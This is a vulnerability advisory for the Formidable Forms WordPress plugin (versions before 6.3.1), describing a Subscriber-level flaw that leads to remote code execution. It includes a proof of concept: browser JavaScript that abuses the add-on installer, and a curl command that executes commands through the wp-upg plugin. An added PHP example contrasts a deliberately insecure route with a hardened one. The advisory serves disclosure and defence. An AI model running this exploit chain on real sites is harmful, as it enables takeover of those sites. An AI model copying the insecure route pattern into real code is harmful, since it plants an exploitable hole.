wpvulndb | Alex Sanford | WPVDB-ID: 33765DA5-C56E-42C1-83DD-FCAAD976B402
History: Jun 05, 2023 - 12:00 a.m.

Formidable Forms < 6.3.1 - Subscriber+ Remote Code Execution

2023-06-05 00:00:00
Alex Sanford
wpscan.com
formidable forms
remote code execution
wordpress org
plugin installation
user authorization
security vulnerability
javascript
browser exploit
wordpress plugin
rce
curl command

EPSS: 0.002 (Low)
Percentile: 60.1%

The plugin's add-on installation functionality neither adequately authorizes the calling user nor validates the package URL it is asked to install. This allows a user with a role as low as Subscriber to install and activate arbitrary plugins, of arbitrary versions, from the WordPress.org plugin repository onto the site, leading to Remote Code Execution.

PoC

1. As a Subscriber user, visit /wp-admin/admin.php?page=formidable-welcome

2. Run the following JavaScript code in the browser console (the token is read from the welcome page's own button link, and the file_url parameter points at a package on WordPress.org):

    var token = jQuery('a.button-primary.frm-button-primary')[0].href.replace(/^.*token=(\w+).*$/, '$1');
    await fetch(`/wp-json/frm-admin/v1/install-addon?token=${token}&file_url=https://downloads.wordpress.org/plugin/wp-upg.2.19.zip`);

3. Note that version 2.19 of the wp-upg plugin has been installed, despite being closed and having a known security vulnerability. Any version of any WordPress.org plugin could be installed here.

4. For RCE with the wp-upg plugin, run the following curl command:

    curl -i 'https://SITE_URL/wp-admin/admin-ajax.php?action=upg_datatable&field=field:exec:id:NULL:NULL'
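The bug class behind this advisory is an installer endpoint whose permission check lets any authenticated user through and whose package URL is taken straight from the request. The following is an added illustration written for this page, not Formidable Forms' own code: a hypothetical REST route showing the weak pattern beside a hardened form that requires the install_plugins and activate_plugins capabilities and installs only packages from a fixed, server-side allowlist. The namespace, route names, handler name and the EXAMPLE_ALLOWED_ADDONS list are assumptions. An allowlist of vendor packages, rather than a check on the download host, is what closes the hole the PoC uses, since the PoC installs a closed plugin from the legitimate downloads.wordpress.org host.

```php
<?php
// Added illustration, not Formidable Forms' code. Route, handler and
// allowlist names are hypothetical.

// Weak pattern: any authenticated (or even unauthenticated) caller reaches
// the handler, and the package URL comes straight from the request.
add_action( 'rest_api_init', function () {
    register_rest_route( 'example-admin/v1', '/install-addon-weak', array(
        'methods'             => 'GET',
        'permission_callback' => '__return_true',
        'callback'            => function ( WP_REST_Request $req ) {
            return example_install_package( $req->get_param( 'file_url' ) );
        },
    ) );
} );

// Hardened pattern: the client picks a slug, never a URL; the URL is fixed
// server-side, and only users allowed to install plugins get this far.
const EXAMPLE_ALLOWED_ADDONS = array(
    'example-addon-a' => 'https://example-vendor.invalid/addons/example-addon-a.zip',
    'example-addon-b' => 'https://example-vendor.invalid/addons/example-addon-b.zip',
);

add_action( 'rest_api_init', function () {
    register_rest_route( 'example-admin/v1', '/install-addon', array(
        'methods'             => 'POST',
        // Cookie-authenticated REST requests only carry a user when a valid
        // X-WP-Nonce is present, so current_user_can() also covers CSRF here.
        'permission_callback' => function () {
            return current_user_can( 'install_plugins' )
                && current_user_can( 'activate_plugins' );
        },
        'args' => array(
            'addon' => array(
                'required'          => true,
                'type'              => 'string',
                'validate_callback' => function ( $value ) {
                    return is_string( $value )
                        && array_key_exists( $value, EXAMPLE_ALLOWED_ADDONS );
                },
            ),
        ),
        'callback' => function ( WP_REST_Request $req ) {
            $url = EXAMPLE_ALLOWED_ADDONS[ $req->get_param( 'addon' ) ];
            return example_install_package( $url );
        },
    ) );
} );

// Shared installer: downloads and unpacks the package with the core upgrader.
function example_install_package( $url ) {
    require_once ABSPATH . 'wp-admin/includes/class-wp-upgrader.php';
    require_once ABSPATH . 'wp-admin/includes/plugin.php';

    $upgrader = new Plugin_Upgrader( new Automatic_Upgrader_Skin() );
    $result   = $upgrader->install( $url );

    if ( is_wp_error( $result ) ) {
        return $result;
    }
    if ( true !== $result ) {
        return new WP_Error( 'install_failed', 'Package could not be installed.', array( 'status' => 500 ) );
    }
    return rest_ensure_response( array( 'installed' => true ) );
}
```

With the hardened route, the request from the PoC fails at the permission callback for a Subscriber (HTTP 403), and even an administrator cannot supply an arbitrary file_url because the route no longer accepts one.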

CPE Name | Operator | Version
formidable | lt | 6.3.1
